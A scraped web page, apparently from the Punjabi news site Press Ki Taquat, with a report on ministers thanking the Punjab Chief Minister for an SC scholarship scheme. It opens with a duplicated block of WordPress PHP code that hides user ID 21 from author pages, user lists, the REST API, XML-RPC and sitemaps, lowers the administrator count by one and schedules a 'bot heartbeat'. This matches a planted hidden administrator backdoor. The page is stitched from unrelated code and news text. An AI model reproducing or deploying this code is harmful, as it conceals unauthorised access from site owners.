add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
ਨਵੀਂ ਐਸ.ਸੀ. ਸਕਾਲਰਸ਼ਿਪ ਸਕੀਮ ਸ਼ੁਰੂ ਕਰਨ ’ਤੇ ਐਸ.ਸੀ./ਬੀ.ਸੀ. ਮੰਤਰੀਆਂ ਤੇ ਵਿਧਾਇਕਾਂ ਨੇ ਕੀਤਾ ਮੁੱਖ ਮੰਤਰੀ ਕੈਪਟਨ ਅਮਰਿੰਦਰ ਸਿੰਘ ਦਾ ਕੀਤਾ ਧੰਨਵਾਦ - Press Ki Taquat
No Result
View All Result
ਚੰਡੀਗੜ੍ਹ, 21 ਅਕਤੂਬਰ – ਅਸ਼ੋਕ ਵਰਮਾ –
ਪੰਜਾਬ ਦੇ ਅਨੁਸੂਚਿਤ ਜਾਤੀਆਂ ਅਤੇ ਪੱਛੜੀਆਂ ਸ਼੍ਰੇਣੀਆਂ ਨਾਲ ਸਬੰਧਤ ਕੈਬਨਿਟ ਮੰਤਰੀਆਂ ਅਤੇ ਵਿਧਾਇਕਾਂ ਨੇ ਪੰਜਾਬ ਦੇ ਐਸ.ਸੀ. ਵਿਦਿਆਰਥੀਆਂ ਲਈ ਡਾ. ਬੀ.ਆਰ. ਅੰਬੇਡਕਰ ਐਸ.ਸੀ. ਪੋਸਟ ਮੈਟਿ੍ਰਕ ਸਕਾਰਲਸ਼ਿਪ ਸਕੀਮ ਸ਼ੁਰੂ ਕਰਨ ’ਤੇ ਮੁੱਖ ਮੰਤਰੀ ਕੈਪਟਨ ਅਮਰਿੰਦਰ ਸਿੰਘ ਦਾ ਧੰਨਵਾਦ ਕੀਤਾ ਹੈ। ਪੰਜਾਬ ਵਿਧਾਨ ਸਭਾ ’ਚ ਕੀਤੀ ਇੱਕ ਵਿਸ਼ੇਸ਼ ਮੀਟਿੰਗ ਦੌਰਾਨ ਕੈਬਨਿਟ ਮੰਤਰੀਆਂ ਅਤੇ ਵਿਧਾਇਕਾਂ ਨੇ ਕਿਹਾ ਕਿ ਇਸ ਸਕੀਮ ਨਾਲ ਲੋੜਵੰਦ ਤੇ ਗ਼ਰੀਬ ਪਰਿਵਾਰਾਂ ਦੇ ਬੱਚਿਆਂ ਦਾ ਭਵਿੱਖ ਉਜਵਲ ਹੋਵੇਗਾ। ਉਨਾਂ ਇਸ ਲੋਕ ਪੱਖੀ ਫੈਸਲੇ ਲਈ ਕੈਪਟਨ ਅਮਰਿੰਦਰ ਸਿੰਘ ਦਾ ਧੰਨਵਾਦ ਕਰਦਿਆਂ ਇਸ ਨੂੰ ਸੂਬੇ ਦੇ ਗ਼ਰੀਬ ਪਰਿਵਾਰਾਂ ਲਈ ਇੱਕ ਵਰਦਾਨ ਦੱਸਿਆ। ਉਨਾਂ ਕਿਹਾ ਕਿ ਕੇਂਦਰ ਸਰਕਾਰ ਨੇ ਐਸ.ਸੀ. ਸਕਾਲਰਸ਼ਿਪ ਸਕੀਮ ਨੂੰ ਚਾਲੂ ਰੱਖਣ ਤੋਂ ਆਪਣੇ ਹੱਥ ਪਿੱਛੇ ਖਿੱਚ ਕੇ ਹਜ਼ਾਰਾਂ ਵਿਦਿਆਰਥੀਆਂ ਦਾ ਭਵਿੱਖ ਖ਼ਤਰੇ ਵਿੱਚ ਪਾ ਦਿੱਤਾ ਸੀ। ਉਨਾਂ ਕਿਹਾ ਕਿ ਸੂਬਾ ਸਰਕਾਰ ਵੱਲੋਂ ਆਪਣੇ ਪੱਧਰ ’ਤੇ ਸ਼ੁਰੂ ਕੀਤੀ ਇਸ ਨਵੀਂ ਸਕੀਮ ਨਾਲ ਅਨੁਸੂਚਿਤ ਜਾਤੀਆਂ ਦੇ ਵਿਦਿਆਰਥੀਆਂ ਨੂੰ ਸਰਕਾਰੀ ਅਤੇ ਪ੍ਰਾਈਵੇਟ ਅਦਾਰਿਆਂ ਵਿੱਚ ਉੱਚ ਸਿੱਖਿਆ ਪ੍ਰਾਪਤ ਕਰਨ ਵਿੱਚ ਸਹਾਇਤਾ ਮਿਲੇਗੀ।
ਮੁੱਖ ਮੰਤਰੀ ਕੈਪਟਨ ਅਮਰਿੰਦਰ ਸਿੰਘ ਦੀ ਨਿੱਜੀ ਵਚਨਬੱਧਤਾ ਬਾਰੇ ਦੱਸਦਿਆਂ ਮੰਤਰੀਆਂ ਤੇ ਵਿਧਾਇਕਾਂ ਨੇ ਕਿਹਾ ਕਿ ਇਸ ਸਕੀਮ ਤਹਿਤ ਆਮਦਨੀ ਦੇ ਮਾਪਦੰਡਾਂ ਨੂੰ 2.5 ਲੱਖ ਰੁਪਏ ਤੋਂ ਵਧਾ ਕੇ 4 ਲੱਖ ਰੁਪਏ ਕਰਨ ਨਾਲ ਵੱਧ ਤੋਂ ਵੱਧ ਵਿਦਿਆਰਥੀਆਂ ਨੂੰ ਇਸ ਸਕੀਮ ਵਿਚ ਸ਼ਾਮਲ ਕਰਨ ਵਿੱਚ ਸਹਾਇਤਾ ਮਿਲੇਗੀ। ਉਨਾਂ ਕਿਹਾ ਕਿ ਅਕਾਦਮਿਕ ਸੈਸ਼ਨ 2020-21 ਤੋਂ ਸ਼ੁਰੂ ਹੋਣ ਵਾਲੀ ਇਹ ਯੋਜਨਾ ਪੰਜਾਬ ਦੇ ਨਿਵਾਸੀ ਅਨੁਸੂਚਿਤ ਜਾਤੀਆਂ ਨਾਲ ਸਬੰਧਤ ਵਿਦਿਆਰਥੀਆਂ ਲਈ ਲਾਗੂ ਹੋਵੇਗੀ। ਇਸ ਮੌਕੇ ਕੈਬਨਿਟ ਮੰਤਰੀ ਸਾਧੂ ਸਿੰਘ ਧਰਮਸੋਤ, ਅਰੁਣਾ ਚੌਧਰੀ, ਚਰਨਜੀਤ ਸਿੰਘ ਚੰਨੀ, ਰਜ਼ੀਆ ਸੁਲਤਾਨਾ ਤੋਂ ਇਲਾਵਾ ਡਿਪਟੀ ਸਪੀਕਰ ਅਜਾਇਬ ਸਿੰਘ ਭੱਟੀ, ਵਿਧਾਇਕ ਰਾਜ ਕੁਮਾਰ ਵੇਰਕਾ, ਸਤਿਕਾਰ ਕੌਰ, ਬਲਵਿੰਦਰ ਸਿੰਘ ਲਾਡੀ, ਬਲਵਿੰਦਰ ਸਿੰਘ ਧਾਲੀਵਾਲ, ਰਾਜ ਕੁਮਾਰ ਚੱਬੇਵਾਲ, ਹਰਜੋਤ ਕਮਲ, ਸੁਰਿੰਦਰ ਸਿੰਘ, ਦਵਿੰਦਰ ਸਿੰਘ ਘੁਬਾਇਆ, ਨੱਥੂ ਰਾਮ, ਪ੍ਰੀਤਮ ਸਿੰਘ ਕੋਟਭਾਈ, ਕੁਲਦੀਪ ਸਿੰਘ ਵੈਦ, ਤਰਸੇਮ ਸਿੰਘ ਡੀ.ਸੀ., ਸੁਸ਼ੀਲ ਕੁਮਾਰ ਰਿੰਕੂ ਅਤੇ ਨਿਰਮਲ ਸਿੰਘ ਸ਼ੁਤਰਾਣਾ ਆਦਿ ਹਾਜ਼ਰ ਸਨ।
Post Views: 83
No Result
View All Result